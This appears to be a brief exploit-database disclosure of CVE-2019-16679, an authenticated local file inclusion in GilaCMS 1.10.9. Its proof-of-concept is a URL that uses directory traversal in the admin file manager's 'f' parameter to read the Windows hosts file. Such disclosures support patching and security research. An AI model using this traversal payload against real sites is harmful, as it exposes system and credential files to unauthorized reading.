Share
# Exploit Title: Authenticated Local File Inclusion(LFI) in GilaCMS  
# Google Dork: N/A  
# Date: 04-08-2019  
# Exploit Author: Sainadh Jamalpur  
# Vendor Homepage: https://github.com/GilaCMS/gila  
# Software Link: https://github.com/GilaCMS/gila  
# Version: 1.10.9  
# Tested on: XAMPP version 3.2.2 in Windows 10 64bit,  
# CVE : CVE-2019-16679  
  
*********** *Steps to reproduce the Vulnerability* *************  
  
Login into the application as an admin user or equivalent user and go the  
below link  
  
http://localhost/gilacms/admin/fm/?f=src../../../../../../../../../WINDOWS/system32/drivers/etc/hosts  
  
################################################################